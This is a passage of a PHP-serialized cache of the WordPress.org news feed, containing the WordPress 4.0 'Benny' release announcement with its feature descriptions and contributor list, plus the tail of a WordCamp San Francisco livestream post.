Francisco live</a></p>\n<p>If you hurry, you can get one of the special livestream tickets, including a WordCamp San Francisco 2104 t-shirt. You can find all the technical details and start times <a href=\"http://2014.sf.wordcamp.org/live-stream/\">at the WordCamp San Francisco website</a>.</p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:56:\"https://wordpress.org/news/2014/10/wcsf-livestream/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"0\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:6;a:6:{s:4:\"data\";s:42:\"\n \n \n \n \n \n \n\n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:5:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:25:\"WordPress 4.0 “Benny”\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:41:\"https://wordpress.org/news/2014/09/benny/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:50:\"https://wordpress.org/news/2014/09/benny/#comments\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 04 Sep 2014 17:05:39 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:1:{i:0;a:5:{s:4:\"data\";s:8:\"Releases\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"http://wordpress.org/news/?p=3296\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:370:\"Version 4.0 of WordPress, named “Benny” in honor of jazz clarinetist and bandleader Benny Goodman, is available for download or update in your WordPress dashboard. While 4.0 is just another number for us after 3.9 and before 4.1, we feel we’ve put a little extra polish into it. This release brings you a smoother writing and management experience […]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Matt Mullenweg\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:23571:\"<p>Version 4.0 of WordPress, named “Benny” in honor of jazz clarinetist and bandleader <a href=\"http://en.wikipedia.org/wiki/Benny_Goodman\">Benny Goodman</a>, is available <a href=\"https://wordpress.org/download/\">for download</a> or update in your WordPress dashboard. While 4.0 is just another number for us after 3.9 and before 4.1, we feel we’ve put a little extra polish into it. This release brings you a smoother writing and management experience we think you’ll enjoy.</p>\n<div id=\"v-bUdzKMro-1\" class=\"video-player\"><embed id=\"v-bUdzKMro-1-video\" src=\"https://v0.wordpress.com/player.swf?v=1.04&guid=bUdzKMro&isDynamicSeeking=true\" type=\"application/x-shockwave-flash\" width=\"692\" height=\"388\" title=\"Introducing WordPress 4.0 "Benny"\" wmode=\"direct\" seamlesstabbing=\"true\" allowfullscreen=\"true\" allowscriptaccess=\"always\" overstretch=\"true\"></embed></div>\n<hr />\n<h2 style=\"text-align: center\">Manage your media with style</h2>\n<p><img class=\"alignnone size-full wp-image-3316\" src=\"https://wordpress.org/news/files/2014/09/media.jpg\" alt=\"Media Library\" width=\"1000\" height=\"586\" />Explore your uploads in a beautiful, endless grid. A new details preview makes viewing and editing any amount of media in sequence a snap.</p>\n<hr />\n<h2 style=\"text-align: center\">Working with embeds has never been easier</h2>\n<div style=\"width: 632px; \" class=\"wp-video\"><!--[if lt IE 9]><script>document.createElement(\'video\');</script><![endif]-->\n<video class=\"wp-video-shortcode\" id=\"video-3296-1\" width=\"632\" height=\"445\" autoplay=\"1\" preload=\"metadata\" controls=\"controls\"><source type=\"video/mp4\" src=\"//s.w.org/images/core/4.0/embed.mp4?_=1\" /><source type=\"video/webm\" src=\"//s.w.org/images/core/4.0/embed.webm?_=1\" /><source type=\"video/ogg\" src=\"//s.w.org/images/core/4.0/embed.ogv?_=1\" /><a href=\"//s.w.org/images/core/4.0/embed.mp4\">//s.w.org/images/core/4.0/embed.mp4</a></video></div>\n<p>Paste in a YouTube URL on a new line, and watch it magically become an embedded video. Now try it with a tweet. Oh yeah — embedding has become a visual experience. The editor shows a true preview of your embedded content, saving you time and giving you confidence.</p>\n<p>We’ve expanded the services supported by default, too — you can embed videos from CollegeHumor, playlists from YouTube, and talks from TED. <a href=\"https://codex.wordpress.org/Embeds\">Check out all of the embeds</a> that WordPress supports.</p>\n<hr />\n<h2 style=\"text-align: center\">Focus on your content</h2>\n<div style=\"width: 632px; \" class=\"wp-video\"><video class=\"wp-video-shortcode\" id=\"video-3296-2\" width=\"632\" height=\"356\" autoplay=\"1\" preload=\"metadata\" controls=\"controls\"><source type=\"video/mp4\" src=\"//s.w.org/images/core/4.0/focus.mp4?_=2\" /><source type=\"video/webm\" src=\"//s.w.org/images/core/4.0/focus.webm?_=2\" /><source type=\"video/ogg\" src=\"//s.w.org/images/core/4.0/focus.ogv?_=2\" /><a href=\"//s.w.org/images/core/4.0/focus.mp4\">//s.w.org/images/core/4.0/focus.mp4</a></video></div>\n<p>Writing and editing is smoother and more immersive with an editor that expands to fit your content as you write, and keeps the formatting tools available at all times.</p>\n<hr />\n<h2 style=\"text-align: center\">Finding the right plugin</h2>\n<p><img class=\"aligncenter size-large wp-image-3309\" src=\"https://wordpress.org/news/files/2014/09/add-plugin1-1024x600.png\" alt=\"Add plugins\" width=\"692\" height=\"405\" /></p>\n<p>There are more than 30,000 free and open source plugins in the WordPress plugin directory. WordPress 4.0 makes it easier to find the right one for your needs, with new metrics, improved search, and a more visual browsing experience.</p>\n<hr />\n<h2 style=\"text-align: center\">The Ensemble</h2>\n<p>This release was led by <a href=\"http://helenhousandi.com\">Helen Hou-Sandí</a>, with the help of these fine individuals. There are 275 contributors with props in this release, a new high. Pull up some Benny Goodman on your music service of choice, as a bandleader or in one of his turns as a classical clarinetist, and check out some of their profiles:</p>\n<p><a href=\"https://profiles.wordpress.org/aaroncampbell\">Aaron D. Campbell</a>, <a href=\"https://profiles.wordpress.org/jorbin\">Aaron Jorbin</a>, <a href=\"https://profiles.wordpress.org/adamsilverstein\">Adam Silverstein</a>, <a href=\"https://profiles.wordpress.org/viper007bond\">Alex Mills (Viper007Bond)</a>, <a href=\"https://profiles.wordpress.org/tellyworth\">Alex Shiels</a>, <a href=\"https://profiles.wordpress.org/alexanderrohmann\">Alexander Rohmann</a>, <a href=\"https://profiles.wordpress.org/aliso\">Alison Barrett</a>, <a href=\"https://profiles.wordpress.org/collinsinternet\">Allan Collins</a>, <a href=\"https://profiles.wordpress.org/amit\">Amit Gupta</a>, <a href=\"https://profiles.wordpress.org/sabreuse\">Amy Hendrix (sabreuse)</a>, <a href=\"https://profiles.wordpress.org/afercia\">Andrea Fercia</a>, <a href=\"https://profiles.wordpress.org/andrezrv\">Andres Villarreal</a>, <a href=\"https://profiles.wordpress.org/zamfeer\">Andrew Mowe</a>, <a href=\"https://profiles.wordpress.org/sumobi\">Andrew Munro (sumobi)</a>, <a href=\"https://profiles.wordpress.org/nacin\">Andrew Nacin</a>, <a href=\"https://profiles.wordpress.org/azaozz\">Andrew Ozz</a>, <a href=\"https://profiles.wordpress.org/andy\">Andy Skelton</a>, <a href=\"https://profiles.wordpress.org/ankit-k-gupta\">Ankit K Gupta</a>, <a href=\"https://profiles.wordpress.org/atimmer\">Anton Timmermans</a>, <a href=\"https://profiles.wordpress.org/arnee\">Arne Brachhold</a>, <a href=\"https://profiles.wordpress.org/aubreypwd\">aubreypwd</a>, <a href=\"https://profiles.wordpress.org/filosofo\">Austin Matzko</a>, <a href=\"https://profiles.wordpress.org/empireoflight\">Ben Dunkle</a>, <a href=\"https://profiles.wordpress.org/kau-boy\">Bernhard Kau</a>, <a href=\"https://profiles.wordpress.org/boonebgorges\">Boone Gorges</a>, <a href=\"https://profiles.wordpress.org/bradyvercher\">Brady Vercher</a>, <a href=\"https://profiles.wordpress.org/bramd\">Bram Duvigneau</a>, <a href=\"https://profiles.wordpress.org/kraftbj\">Brandon Kraft</a>, <a href=\"https://profiles.wordpress.org/krogsgard\">Brian Krogsgard</a>, <a href=\"https://profiles.wordpress.org/brianlayman\">Brian Layman</a>, <a href=\"https://profiles.wordpress.org/rzen\">Brian Richards</a>, <a href=\"https://profiles.wordpress.org/camdensegal\">Camden Segal</a>, <a href=\"https://profiles.wordpress.org/sixhours\">Caroline Moore</a>, <a href=\"https://profiles.wordpress.org/mackensen\">Charles Fulton</a>, <a href=\"https://profiles.wordpress.org/chouby\">Chouby</a>, <a href=\"https://profiles.wordpress.org/chrico\">ChriCo</a>, <a href=\"https://profiles.wordpress.org/c3mdigital\">Chris Olbekson</a>, <a href=\"https://profiles.wordpress.org/chrisl27\">chrisl27</a>, <a href=\"https://profiles.wordpress.org/caxelsson\">Christian Axelsson</a>, <a href=\"https://profiles.wordpress.org/cfinke\">Christopher Finke</a>, <a href=\"https://profiles.wordpress.org/boda1982\">Christopher Spires</a>, <a href=\"https://profiles.wordpress.org/clifgriffin\">Clifton Griffin</a>, <a href=\"https://profiles.wordpress.org/jupiterwise\">Corey McKrill</a>, <a href=\"https://profiles.wordpress.org/corphi\">Corphi</a>, <a href=\"https://profiles.wordpress.org/extendwings\">Daisuke Takahashi</a>, <a href=\"https://profiles.wordpress.org/ghost1227\">Dan Griffiths</a>, <a href=\"https://profiles.wordpress.org/danielbachhuber\">Daniel Bachhuber</a>, <a href=\"https://profiles.wordpress.org/danielhuesken\">Daniel Husken</a>, <a href=\"https://profiles.wordpress.org/redsweater\">Daniel Jalkut (Red Sweater)</a>, <a href=\"https://profiles.wordpress.org/dannydehaan\">Danny de Haan</a>, <a href=\"https://profiles.wordpress.org/dkotter\">Darin Kotter</a>, <a href=\"https://profiles.wordpress.org/koop\">Daryl Koopersmith</a>, <a href=\"https://profiles.wordpress.org/dllh\">Daryl L. L. Houston (dllh)</a>, <a href=\"https://profiles.wordpress.org/davidakennedy\">David A. Kennedy</a>, <a href=\"https://profiles.wordpress.org/dlh\">David Herrera</a>, <a href=\"https://profiles.wordpress.org/dnaber-de\">David Naber</a>, <a href=\"https://profiles.wordpress.org/davidthemachine\">DavidTheMachine</a>, <a href=\"https://profiles.wordpress.org/debaat\">DeBAAT</a>, <a href=\"https://profiles.wordpress.org/dd32\">Dion Hulse</a>, <a href=\"https://profiles.wordpress.org/ocean90\">Dominik Schilling</a>, <a href=\"https://profiles.wordpress.org/donncha\">Donncha O Caoimh</a>, <a href=\"https://profiles.wordpress.org/drewapicture\">Drew Jaynes</a>, <a href=\"https://profiles.wordpress.org/dustyn\">Dustyn Doyle</a>, <a href=\"https://profiles.wordpress.org/eddiemoya\">Eddie Moya</a>, <a href=\"https://profiles.wordpress.org/oso96_2000\">Eduardo Reveles</a>, <a href=\"https://profiles.wordpress.org/edwin-at-studiojoyocom\">Edwin Siebel</a>, <a href=\"https://profiles.wordpress.org/ehg\">ehg</a>, <a href=\"https://profiles.wordpress.org/erayalakese\">erayalakese</a>, <a href=\"https://profiles.wordpress.org/ericlewis\">Eric Andrew Lewis</a>, <a href=\"https://profiles.wordpress.org/ebinnion\">Eric Binnion</a>, <a href=\"https://profiles.wordpress.org/ericmann\">Eric Mann</a>, <a href=\"https://profiles.wordpress.org/ejdanderson\">Evan Anderson</a>, <a href=\"https://profiles.wordpress.org/eherman24\">Evan Herman</a>, <a href=\"https://profiles.wordpress.org/fab1en\">Fabien Quatravaux</a>, <a href=\"https://profiles.wordpress.org/fahmiadib\">Fahmi Adib</a>, <a href=\"https://profiles.wordpress.org/feedmeastraycat\">feedmeastraycat</a>, <a href=\"https://profiles.wordpress.org/frank-klein\">Frank Klein</a>, <a href=\"https://profiles.wordpress.org/garhdez\">garhdez</a>, <a href=\"https://profiles.wordpress.org/garyc40\">Gary Cao</a>, <a href=\"https://profiles.wordpress.org/garyj\">Gary Jones</a>, <a href=\"https://profiles.wordpress.org/pento\">Gary Pendergast</a>, <a href=\"https://profiles.wordpress.org/garza\">garza</a>, <a href=\"https://profiles.wordpress.org/gauravmittal1995\">gauravmittal1995</a>, <a href=\"https://profiles.wordpress.org/gavra\">Gavrisimo</a>, <a href=\"https://profiles.wordpress.org/georgestephanis\">George Stephanis</a>, <a href=\"https://profiles.wordpress.org/grahamarmfield\">Graham Armfield</a>, <a href=\"https://profiles.wordpress.org/vancoder\">Grant Mangham</a>, <a href=\"https://profiles.wordpress.org/gcorne\">Gregory Cornelius</a>, <a href=\"https://profiles.wordpress.org/bordoni\">Gustavo Bordoni</a>, <a href=\"https://profiles.wordpress.org/harrym\">harrym</a>, <a href=\"https://profiles.wordpress.org/hebbet\">hebbet</a>, <a href=\"https://profiles.wordpress.org/hinnerk\">Hinnerk Altenburg</a>, <a href=\"https://profiles.wordpress.org/hlashbrooke\">Hugh Lashbrooke</a>, <a href=\"https://profiles.wordpress.org/iljoja\">iljoja</a>, <a href=\"https://profiles.wordpress.org/imath\">imath</a>, <a href=\"https://profiles.wordpress.org/ipstenu\">Ipstenu (Mika Epstein)</a>, <a href=\"https://profiles.wordpress.org/issuu\">issuu</a>, <a href=\"https://profiles.wordpress.org/jdgrimes\">J.D. Grimes</a>, <a href=\"https://profiles.wordpress.org/jacklenox\">Jack Lenox</a>, <a href=\"https://profiles.wordpress.org/jackreichert\">Jack Reichert</a>, <a href=\"https://profiles.wordpress.org/jacobdubail\">Jacob Dubail</a>, <a href=\"https://profiles.wordpress.org/janhenkg\">JanHenkG</a>, <a href=\"https://profiles.wordpress.org/avryl\">Janneke Van Dorpe</a>, <a href=\"https://profiles.wordpress.org/jwenerd\">Jared Wenerd</a>, <a href=\"https://profiles.wordpress.org/jaza613\">Jaza613</a>, <a href=\"https://profiles.wordpress.org/jeffstieler\">Jeff Stieler</a>, <a href=\"https://profiles.wordpress.org/jeremyfelt\">Jeremy Felt</a>, <a href=\"https://profiles.wordpress.org/jpry\">Jeremy Pry</a>, <a href=\"https://profiles.wordpress.org/slimndap\">Jeroen Schmit</a>, <a href=\"https://profiles.wordpress.org/jerrysarcastic\">Jerry Bates (jerrysarcastic)</a>, <a href=\"https://profiles.wordpress.org/jesin\">Jesin A</a>, <a href=\"https://profiles.wordpress.org/jayjdk\">Jesper Johansen (jayjdk)</a>, <a href=\"https://profiles.wordpress.org/engelen\">Jesper van Engelen</a>, <a href=\"https://profiles.wordpress.org/jesper800\">Jesper van Engelen</a>, <a href=\"https://profiles.wordpress.org/jessepollak\">Jesse Pollak</a>, <a href=\"https://profiles.wordpress.org/jgadbois\">jgadbois</a>, <a href=\"https://profiles.wordpress.org/jartes\">Joan Artes</a>, <a href=\"https://profiles.wordpress.org/joedolson\">Joe Dolson</a>, <a href=\"https://profiles.wordpress.org/joehoyle\">Joe Hoyle</a>, <a href=\"https://profiles.wordpress.org/jkudish\">Joey Kudish</a>, <a href=\"https://profiles.wordpress.org/johnbillion\">John Blackbourn</a>, <a href=\"https://profiles.wordpress.org/johnjamesjacoby\">John James Jacoby</a>, <a href=\"https://profiles.wordpress.org/johnzanussi\">John Zanussi</a>, <a href=\"https://profiles.wordpress.org/duck_\">Jon Cave</a>, <a href=\"https://profiles.wordpress.org/jonnyauk\">jonnyauk</a>, <a href=\"https://profiles.wordpress.org/joostdevalk\">Joost de Valk</a>, <a href=\"https://profiles.wordpress.org/softmodeling\">Jordi Cabot</a>, <a href=\"https://profiles.wordpress.org/jjeaton\">Josh Eaton</a>, <a href=\"https://profiles.wordpress.org/tai\">JOTAKI Taisuke</a>, <a href=\"https://profiles.wordpress.org/juliobox\">Julio Potier</a>, <a href=\"https://profiles.wordpress.org/justinsainton\">Justin Sainton</a>, <a href=\"https://profiles.wordpress.org/jtsternberg\">Justin Sternberg</a>, <a href=\"https://profiles.wordpress.org/greenshady\">Justin Tadlock</a>, <a href=\"https://profiles.wordpress.org/kadamwhite\">K.Adam White</a>, <a href=\"https://profiles.wordpress.org/trepmal\">Kailey (trepmal)</a>, <a href=\"https://profiles.wordpress.org/kapeels\">kapeels</a>, <a href=\"https://profiles.wordpress.org/ryelle\">Kelly Dwan</a>, <a href=\"https://profiles.wordpress.org/kevinlangleyjr\">Kevin Langley</a>, <a href=\"https://profiles.wordpress.org/kworthington\">Kevin Worthington</a>, <a href=\"https://profiles.wordpress.org/kpdesign\">Kim Parsell</a>, <a href=\"https://profiles.wordpress.org/kwight\">Kirk Wight</a>, <a href=\"https://profiles.wordpress.org/kitchin\">kitchin</a>, <a href=\"https://profiles.wordpress.org/ixkaito\">Kite</a>, <a href=\"https://profiles.wordpress.org/knutsp\">Knut Sparhell</a>, <a href=\"https://profiles.wordpress.org/kovshenin\">Konstantin Kovshenin</a>, <a href=\"https://profiles.wordpress.org/obenland\">Konstantin Obenland</a>, <a href=\"https://profiles.wordpress.org/kurtpayne\">Kurt Payne</a>, <a href=\"https://profiles.wordpress.org/lancewillett\">Lance Willett</a>, <a href=\"https://profiles.wordpress.org/leewillis77\">Lee Willis</a>, <a href=\"https://profiles.wordpress.org/lessbloat\">lessbloat</a>, <a href=\"https://profiles.wordpress.org/layotte\">Lew Ayotte</a>, <a href=\"https://profiles.wordpress.org/lritter\">lritter</a>, <a href=\"https://profiles.wordpress.org/lukecarbis\">Luke Carbis</a>, <a href=\"https://profiles.wordpress.org/lgedeon\">Luke Gedeon</a>, <a href=\"https://profiles.wordpress.org/m_i_n\">m_i_n</a>, <a href=\"https://profiles.wordpress.org/funkatronic\">Manny Fleurmond</a>, <a href=\"https://profiles.wordpress.org/targz-1\">Manuel Schmalstieg</a>, <a href=\"https://profiles.wordpress.org/clorith\">Marius (Clorith)</a>, <a href=\"https://profiles.wordpress.org/markjaquith\">Mark Jaquith</a>, <a href=\"https://profiles.wordpress.org/markoheijnen\">Marko Heijnen</a>, <a href=\"https://profiles.wordpress.org/mjbanks\">Matt Banks</a>, <a href=\"https://profiles.wordpress.org/sivel\">Matt Martz</a>, <a href=\"https://profiles.wordpress.org/matt\">Matt Mullenweg</a>, <a href=\"https://profiles.wordpress.org/mattwiebe\">Matt Wiebe</a>, <a href=\"https://profiles.wordpress.org/mboynes\">Matthew Boynes</a>, <a href=\"https://profiles.wordpress.org/mdbitz\">Matthew Denton</a>, <a href=\"https://profiles.wordpress.org/mattheweppelsheimer\">Matthew Eppelsheimer</a>, <a href=\"https://profiles.wordpress.org/mattheu\">Matthew Haines-Young</a>, <a href=\"https://profiles.wordpress.org/mattyrob\">mattyrob</a>, <a href=\"https://profiles.wordpress.org/meekyhwang\">meekyhwang</a>, <a href=\"https://profiles.wordpress.org/melchoyce\">Mel Choyce</a>, <a href=\"https://profiles.wordpress.org/mdawaffe\">Michael Adams (mdawaffe)</a>, <a href=\"https://profiles.wordpress.org/michalzuber\">michalzuber</a>, <a href=\"https://profiles.wordpress.org/midxcat\">midxcat</a>, <a href=\"https://profiles.wordpress.org/mauteri\">Mike Auteri</a>, <a href=\"https://profiles.wordpress.org/mikehansenme\">Mike Hansen</a>, <a href=\"https://profiles.wordpress.org/mikejolley\">Mike Jolley</a>, <a href=\"https://profiles.wordpress.org/mikelittle\">Mike Little</a>, <a href=\"https://profiles.wordpress.org/mikemanger\">Mike Manger</a>, <a href=\"https://profiles.wordpress.org/mnelson4\">Mike Nelson</a>, <a href=\"https://profiles.wordpress.org/dh-shredder\">Mike Schroder</a>, <a href=\"https://profiles.wordpress.org/mikeyarce\">Mikey Arce</a>, <a href=\"https://profiles.wordpress.org/dimadin\">Milan Dinic</a>, <a href=\"https://profiles.wordpress.org/morganestes\">Morgan Estes</a>, <a href=\"https://profiles.wordpress.org/usermrpapa\">Mr Papa</a>, <a href=\"https://profiles.wordpress.org/mrmist\">mrmist</a>, <a href=\"https://profiles.wordpress.org/m_uysl\">Mustafa Uysal</a>, <a href=\"https://profiles.wordpress.org/muvimotv\">MuViMoTV</a>, <a href=\"https://profiles.wordpress.org/nabil_kadimi\">nabil_kadimi</a>, <a href=\"https://profiles.wordpress.org/namibia\">Namibia</a>, <a href=\"https://profiles.wordpress.org/alex-ye\">Nashwan Doaqan</a>, <a href=\"https://profiles.wordpress.org/nd987\">nd987</a>, <a href=\"https://profiles.wordpress.org/neil_pie\">Neil Pie</a>, <a href=\"https://profiles.wordpress.org/niallkennedy\">Niall Kennedy</a>, <a href=\"https://profiles.wordpress.org/celloexpressions\">Nick Halsey</a>, <a href=\"https://profiles.wordpress.org/nbachiyski\">Nikolay Bachiyski</a>, <a href=\"https://profiles.wordpress.org/schoenwaldnils\">Nils Schonwald</a>, <a href=\"https://profiles.wordpress.org/ninos-ego\">Ninos</a>, <a href=\"https://profiles.wordpress.org/nvwd\">Nowell VanHoesen</a>, <a href=\"https://profiles.wordpress.org/compute\">Patrick Hesselberg</a>, <a href=\"https://profiles.wordpress.org/pbearne\">Paul Bearne</a>, <a href=\"https://profiles.wordpress.org/pdclark\">Paul Clark</a>, <a href=\"https://profiles.wordpress.org/paulschreiber\">Paul Schreiber</a>, <a href=\"https://profiles.wordpress.org/paulwilde\">Paul Wilde</a>, <a href=\"https://profiles.wordpress.org/pavelevap\">pavelevap</a>, <a href=\"https://profiles.wordpress.org/westi\">Peter Westwood</a>, <a href=\"https://profiles.wordpress.org/philiparthurmoore\">Philip Arthur Moore</a>, <a href=\"https://profiles.wordpress.org/philipjohn\">Philip John</a>, <a href=\"https://profiles.wordpress.org/senlin\">Piet Bos</a>, <a href=\"https://profiles.wordpress.org/psoluch\">Piotr Soluch</a>, <a href=\"https://profiles.wordpress.org/mordauk\">Pippin Williamson</a>, <a href=\"https://profiles.wordpress.org/purzlbaum\">purzlbaum</a>, <a href=\"https://profiles.wordpress.org/rachelbaker\">Rachel Baker</a>, <a href=\"https://profiles.wordpress.org/rclations\">RC Lations</a>, <a href=\"https://profiles.wordpress.org/iamfriendly\">Richard Tape</a>, <a href=\"https://profiles.wordpress.org/rickalee\">Ricky Lee Whittemore</a>, <a href=\"https://profiles.wordpress.org/rob1n\">rob1n</a>, <a href=\"https://profiles.wordpress.org/miqrogroove\">Robert Chapin</a>, <a href=\"https://profiles.wordpress.org/rdall\">Robert Dall</a>, <a href=\"https://profiles.wordpress.org/harmr\">RobertHarm</a>, <a href=\"https://profiles.wordpress.org/rohan013\">Rohan Rawat</a>, <a href=\"https://profiles.wordpress.org/rhurling\">Rouven Hurling</a>, <a href=\"https://profiles.wordpress.org/ruudjoyo\">Ruud Laan</a>, <a href=\"https://profiles.wordpress.org/ryan\">Ryan Boren</a>, <a href=\"https://profiles.wordpress.org/rmccue\">Ryan McCue</a>, <a href=\"https://profiles.wordpress.org/sammybeats\">Sam Brodie</a>, <a href=\"https://profiles.wordpress.org/otto42\">Samuel Wood (Otto)</a>, <a href=\"https://profiles.wordpress.org/sathishn\">Sathish Nagarajan</a>, <a href=\"https://profiles.wordpress.org/coffee2code\">Scott Reilly</a>, <a href=\"https://profiles.wordpress.org/wonderboymusic\">Scott Taylor</a>, <a href=\"https://profiles.wordpress.org/greglone\">ScreenfeedFr</a>, <a href=\"https://profiles.wordpress.org/scribu\">scribu</a>, <a href=\"https://profiles.wordpress.org/seanchayes\">Sean Hayes</a>, <a href=\"https://profiles.wordpress.org/nessworthy\">Sean Nessworthy</a>, <a href=\"https://profiles.wordpress.org/sergejmueller\">Sergej Muller</a>, <a href=\"https://profiles.wordpress.org/sergeybiryukov\">Sergey Biryukov</a>, <a href=\"https://profiles.wordpress.org/shanebp\">shanebp</a>, <a href=\"https://profiles.wordpress.org/sharonaustin\">Sharon Austin</a>, <a href=\"https://profiles.wordpress.org/shaunandrews\">Shaun Andrews</a>, <a href=\"https://profiles.wordpress.org/simonp303\">Simon Pollard</a>, <a href=\"https://profiles.wordpress.org/simonwheatley\">Simon Wheatley</a>, <a href=\"https://profiles.wordpress.org/slobodanmanic\">Slobodan Manic</a>, <a href=\"https://profiles.wordpress.org/solarissmoke\">solarissmoke</a>, <a href=\"https://profiles.wordpress.org/sphoid\">sphoid</a>, <a href=\"https://profiles.wordpress.org/stephdau\">Stephane Daury</a>, <a href=\"https://profiles.wordpress.org/netweb\">Stephen Edgar</a>, <a href=\"https://profiles.wordpress.org/stompweb\">Steven Jones</a>, <a href=\"https://profiles.wordpress.org/strangerstudios\">strangerstudios</a>, <a href=\"https://profiles.wordpress.org/5um17\">Sumit Singh</a>, <a href=\"https://profiles.wordpress.org/t4k1s\">t4k1s</a>, <a href=\"https://profiles.wordpress.org/iamtakashi\">Takashi Irie</a>, <a href=\"https://profiles.wordpress.org/taylorde\">Taylor Dewey</a>, <a href=\"https://profiles.wordpress.org/thomasvanderbeek\">Thomas van der Beek</a>, <a href=\"https://profiles.wordpress.org/tillkruess\">Till Kruss</a>, <a href=\"https://profiles.wordpress.org/codenameeli\">Tim 'Eli' Dalbey</a>, <a href=\"https://profiles.wordpress.org/tmeister\">tmeister</a>, <a href=\"https://profiles.wordpress.org/tobiasbg\">TobiasBg</a>, <a href=\"https://profiles.wordpress.org/tjnowell\">Tom J Nowell</a>, <a href=\"https://profiles.wordpress.org/willmot\">Tom Willmot</a>, <a href=\"https://profiles.wordpress.org/topher1kenobe\">Topher</a>, <a href=\"https://profiles.wordpress.org/torresga\">torresga</a>, <a href=\"https://profiles.wordpress.org/liljimmi\">Tracy Levesque</a>, <a href=\"https://profiles.wordpress.org/wpsmith\">Travis Smith</a>, <a href=\"https://profiles.wordpress.org/treyhunner\">treyhunner</a>, <a href=\"https://profiles.wordpress.org/umeshsingla\">Umesh Kumar</a>, <a href=\"https://profiles.wordpress.org/vinod-dalvi\">Vinod Dalvi</a>, <a href=\"https://profiles.wordpress.org/vlajos\">vlajos</a>, <a href=\"https://profiles.wordpress.org/voldemortensen\">voldemortensen</a>, <a href=\"https://profiles.wordpress.org/westonruter\">Weston Ruter</a>, <a href=\"https://profiles.wordpress.org/winterdev\">winterDev</a>, <a href=\"https://profiles.wordpress.org/wojtekszkutnik\">Wojtek Szkutnik</a>, <a href=\"https://profiles.wordpress.org/yoavf\">Yoav Farhi</a>, <a href=\"https://profiles.wordpress.org/katzwebdesign\">Zack Katz</a>, <a href=\"https://profiles.wordpress.org/tollmanz\">Zack Tollman</a>, and <a href=\"https://profiles.wordpress.org/zoerooney\">Zoe Rooney</a>. Also thanks to <a href=\"http://michaelpick.wordpress.com/\">Michael Pick</a> for producing the release video, and Helen with <a href=\"http://adriansandi.com\">Adrián Sandí</a> for the music.</p>\n<p>If you want to follow along or help out, check out <a href=\"https://make.wordpress.org/\">Make WordPress</a> and our <a href=\"https://make.wordpress.org/core/\">core development blog</a>. Thanks for choosing WordPress. See you soon for version 4.1!</p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:46:\"https://wordpress.org/news/2014/09/benny/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"0\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:7;a:6:{s:4:\"data\";s:45:\"\n \n \n \n \n \n \n \n\n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:5:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"WordPress 4.0 Release 